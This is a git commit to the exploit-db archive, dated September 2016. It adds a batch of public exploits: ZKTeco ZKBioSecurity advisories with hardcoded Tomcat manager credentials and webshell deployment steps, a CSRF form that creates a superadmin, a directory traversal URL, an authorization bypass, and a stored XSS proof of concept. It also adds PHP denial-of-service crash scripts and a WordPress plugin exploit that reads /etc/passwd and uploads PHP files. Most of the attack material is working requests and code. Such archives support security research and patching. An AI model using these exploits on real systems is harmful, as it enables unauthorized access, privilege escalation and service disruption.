DB: 2016-09-01

15 new exploits

WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
PHP 5.0.0 - snmpwalkoid() Local Denial of Service
PHP 5.0.0 - fbird_[p]connect() Local Denial of Service
PHP 5.0.0 - snmpwalk() Local Denial of Service
PHP 5.0.0 - snmprealwalk() Local Denial of Service
PHP 5.0.0 - snmpset() Local Denial of Service
PHP 7.0 - AppendIterator::append Local Denial of Service
ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation
ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation
ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution
ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery
ZKTeco ZKBioSecurity 3.0 - Directory Traversal
ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass
ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting
PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service
This commit is contained in:
Offensive Security 2016-09-01 05:08:40 +00:00
parent 1f0c845486
commit 3a2154afbd
35 changed files with 779 additions and 19 deletions

View file

@ -36439,8 +36439,23 @@ id,file,description,date,author,platform,type,port
40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0
40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
40314,platforms/php/dos/40314.php,"PHP 5.0.0 - hw_docbyanchor() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
40315,platforms/php/dos/40315.php,"PHP 5.0.0 - html_doc_file() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
40316,platforms/php/dos/40316.php,"PHP 5.0.0 - snmpwalkoid() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40317,platforms/php/dos/40317.php,"PHP 5.0.0 - fbird_[p]connect() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40318,platforms/php/dos/40318.php,"PHP 5.0.0 - snmpwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40319,platforms/php/dos/40319.php,"PHP 5.0.0 - snmprealwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40320,platforms/php/dos/40320.php,"PHP 5.0.0 - snmpset() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40321,platforms/php/dos/40321.php,"PHP 7.0 - AppendIterator::append Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40322,platforms/windows/local/40322.txt,"ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088
40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0

Can't render this file because it is too large.

98
platforms/jsp/webapps/40324.txt Executable file
View file

@ -0,0 +1,98 @@
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
The application comes bundled with a pre-configured apache tomcat server and an
exposed 'manager' application that after authenticating with the credentials:
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.
Ref: https://www.exploit-db.com/exploits/31433/
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php
18.07.2016
--
Contents of tomcat-users.xml:
-----------------------------
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:
<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>
</tomcat-users>
-----------------------------
Open Manager application and login:
-----------------------------------
http://127.0.0.1:8088/manager (zkteco:zkt123)
Deploy JSP webshell, issue command:
-----------------------------------
- Request: whoami
- Response: nt authority\system
call the findConnectors() method of the Service use:
----------------------------------------------------
http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
Response:
OK - Operation findConnectors returned:
Connector[HTTP/1.1-8088]
Connector[AJP/1.3-8019]
List of all loaded servlets:
----------------------------
http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet

View file

@ -0,0 +1,72 @@
<!--
ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
<input type="hidden" name="authUser&#46;username" value="thricer" />
<input type="hidden" name="authUser&#46;loginPwd" value="111111" />
<input type="hidden" name="repassword" value="111111" />
<input type="hidden" name="authUser&#46;isActive" value="true" />
<input type="hidden" name="authUser&#46;isSuperuser" value="true" />
<input type="hidden" name="groupIds" value="1" />
<input type="hidden" name="deptIds" value="1" />
<input type="hidden" name="areaIds" value="1" />
<input type="hidden" name="authUser&#46;email" value="lab@zeroscience.mk" />
<input type="hidden" name="authUser&#46;name" value="test" />
<input type="hidden" name="authUser&#46;lastName" value="lasttest" />
<input type="hidden" name="fingerTemplate" value="&#13;" />
<input type="hidden" name="fingerId" value="&#13;" />
<input type="hidden" name="logMethod" value="add" />
<input type="hidden" name="un" value="1471451964349_2769" />
<input type="hidden" name="systemCode" value="base" />
<input type="submit" value="Go" />
</form>
</body>
</html>

53
platforms/jsp/webapps/40326.txt Executable file
View file

@ -0,0 +1,53 @@

ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
18.07.2016
--
http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml

80
platforms/jsp/webapps/40327.txt Executable file
View file

@ -0,0 +1,80 @@
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The issue exist due to the way visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
whether the request is coming from the local machine and sets the ip variable
to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
username value with the password '123456' to authenticate and disclose sensitive
information and/or do unauthorized actions.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
18.07.2016
--
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------
1: <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
2: <%@page import="com.zk.common.util.EnvironmentUtil"%>
3: <%
4: String path = request.getContextPath();
5: String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
6:
7: String ip= EnvironmentUtil.getClientIp(request);
8: if("0:0:0:0:0:0:0:1".equals(ip))
9: {
10: ip = "127.0.0.1";
11: }
12:
13: %>
14: <jsp:include page="login.jsp"/>
15: <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
16:
17: <script>
18: function autoLogin()
19: {
20: $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
21: $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
22: var ip = "<%=ip%>";
23: $("#userLoginForm input[name='username']").val(ip);
24: $("#userLoginForm input[name='password']").val("123456");
25: $('#userLoginForm').submit();
26: }
27: window.onload=autoLogin;
28: </script>
---------------------------------------------------------------------------------

View file

@ -0,0 +1,57 @@
<!--
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252
Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: CherryPy/3.1.0beta3 WSGI Server
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
Python 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
<input type="hidden" name="pk" value="None" />
<input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
<input type="hidden" name="holiday&#95;type" value="1" />
<input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
<input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
<input type="hidden" name="loop&#95;by&#95;year" value="2" />
<input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

15
platforms/php/dos/40316.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmpwalkoid('127.0.0.1', 'public', $str);
?>

16
platforms/php/dos/40317.php Executable file
View file

@ -0,0 +1,16 @@
<?php
#############################################################################
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");
$str = str_repeat('A', 9999);
//fbird_connect($str);
fbird_pconnect($str);
?>

15
platforms/php/dos/40318.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmpwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmpwalk('127.0.0.1', 'public', $str);
?>

15
platforms/php/dos/40319.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmprealwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmprealwalk('127.0.0.1', 'public', $str);
?>

15
platforms/php/dos/40320.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 snmpset() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
$str = str_repeat('A', 9999);
snmpset("localhost", 'public', $str, '', '');
?>

12
platforms/php/dos/40321.php Executable file
View file

@ -0,0 +1,12 @@
<?php
#############################################################################
## PHP 7.0 AppendIterator::append Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$tmp = new AppendIterator();
$tmp->append($tmp); // Crash
?>

17
platforms/php/dos/40329.php Executable file
View file

@ -0,0 +1,17 @@
<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
function jsonSerialize() {
$jsonTmp = new jsonTmp();
return $jsonTmp;
}
}
json_encode(new jsonTmp());
?>

View file

@ -1,4 +1,4 @@
#==================================================================================================
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#==================================================================================================

View file

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";

View file

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";

View file

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "X7 Chat <=2.0.4 'old_prefix' blind SQL injection / privilege escalation exploit\r\n";
echo "by rgod rgod@autistici.org\r\n";

View file

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";

View file

@ -1,4 +1,4 @@
########################### www.system-defacers.org ###############
########################### www.system-defacers.org ###############
# Found By CeNGiZ-HaN cengiz-han@system-defacers.org
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################

View file

@ -1,4 +1,4 @@
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+

View file

@ -1,4 +1,4 @@
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+

View file

@ -1,4 +1,4 @@
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+
+ PHPAuction 2.1 Remote File Inclusion
+

View file

@ -1,4 +1,4 @@
#=================================================================
#=================================================================
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
#================================================================
# |

View file

@ -1,4 +1,4 @@
TinyPHPForum 3.6 Admin Maker<br>
TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net
<FORM method=post enctype="multipart/form-data">

View file

@ -1,4 +1,4 @@
Script: TSEP <= 0.942
Script: TSEP <= 0.942
URL: www.tsep.info
Discovered: beford <xbefordx gmail com>
Comments: "register_globals" must be enabled duh.

View file

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
echo "execution exploit\n";

View file

@ -1,4 +1,4 @@
#!/usr/bin/php -q -d short_open_tag=on
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
echo "administrative credentials disclosure exploit\n";

View file

@ -1,4 +1,4 @@
SQLiteWebAdmin
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
SQLiteWebAdmin is a simple PHP program for administrating

View file

@ -1,4 +1,4 @@
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/

View file

@ -1,4 +1,4 @@
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)

119
platforms/php/webapps/40295.txt Executable file
View file

@ -0,0 +1,119 @@
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
Link: https://wordpress.org/plugins/cysteme-finder/
Version: 1.3
Date: August 23rd 2016
Exploit Author: T0w3ntum
Author Website: t0w3ntum.com
### SUMMARY
CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request
to http://server/wp-content/plugins/cysteme-finder/php/connector.php
This allows attackers to upload, download, and browse the remote file system.
### LFI
- Retrieve all data in the root wordpress directory. This will return JSON.
Exploit:
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1
Reply:
{
"cwd": {
"mime": "directory",
"ts": 1471999484,
"read": 1,
"write": 1,
"size": 0,
"hash": "l1_Lw",
"volumeid": "l1_",
"name": "Fichiers du site",
"date": "Today 20:44",
"locked": 1,
"dirs": 1
},
"options": {
"path": "Fichiers du site",
"url": null,
"tmbUrl": "",
"disabled": [
],
"separator": "\/",
"copyOverwrite": 1,
"archivers": {
"create": [
"application\/x-tar",
"application\/x-gzip",
"application\/x-bzip2"
],
"extract": [
"application\/x-tar",
"application\/x-gzip",
"application\/x-bzip2",
"application\/zip"
]
}
},
"files": [
{
"mime": "directory",
"ts": 1471999484,
"read": 1,
"write": 1,
"size": 0,
"hash": "l1_Lw",
"volumeid": "l1_",
"name": "Fichiers du site",
"date": "Today 20:44",
"locked": 1,
"dirs": 1
},
{
"mime": "text\/plain",
"ts": 1471714510,
"read": 1,
"write": 1,
"size": 813,
"hash": "l1_Lmh0YWNjZXNz",
"name": ".htaccess",
"phash": "l1_Lw",
"date": "20 Aug 2016 13:35"
},
Simply replacing wphome with any other directory path will return file information for that directory.
If you want to download that file, get the hash value for the file and include it in the following request:
Will download /etc/passwd
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1
### File Upload
As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following.
POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
Host: http://server
Content-Length: 314
Origin: http://server
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
----------723608748
Content-Disposition: form-data; name="cmd"
upload
----------723608748
Content-Disposition: form-data; name="target"
l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html
<?php phpinfo(); ?>
----------723608748--

View file

@ -1,4 +1,4 @@
#!/usr/bin/perl
#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#

View file

@ -1,4 +1,4 @@
/*
/*
by Luigi Auriemma

112
platforms/windows/local/40322.txt Executable file
View file

@ -0,0 +1,112 @@
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.6
3.0.1.5 (160622)
3.0.1.1 (160216)
Summary: ZKTime.Net V3.0 is a new generation time attendance
management software. Meanwhile, it integrates with time attendance
and access control system. Some frequently used functions such as
attendance reports, device management and employee management can
be managed directly on the home page which providing excellent user
experience. Owing to the Pay code function, it can generate both
time attendance records and corresponding payroll in the software
and easy to merge with the most ERP and Payroll software, which can
rapidly upgrade your working efficiency. The brand new flat GUI design
and humanized structure will make your daily management more pleasant
and convenient.
Desc: ZKTime.Net suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'C' flag (Change) for 'Everyone' group, making the
entire directory 'ZKTimeNet3.0' and its files and sub-dirs world-writable.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5360
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php
18.07.2016
--
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
c:\Program Files (x86)\ZKTimeNet3.0
Everyone Change [RWXD]
NT SERVICE\TrustedInstaller Special Access [A]
NT AUTHORITY\SYSTEM Special Access [A]
BUILTIN\Administrators Special Access [A]
BUILTIN\Users Special Access [RX]
CREATOR OWNER Special Access [A]
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
Everyone Change [RWXD]
C:\Program Files (x86)>cacls ZKTimeNet3.0
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
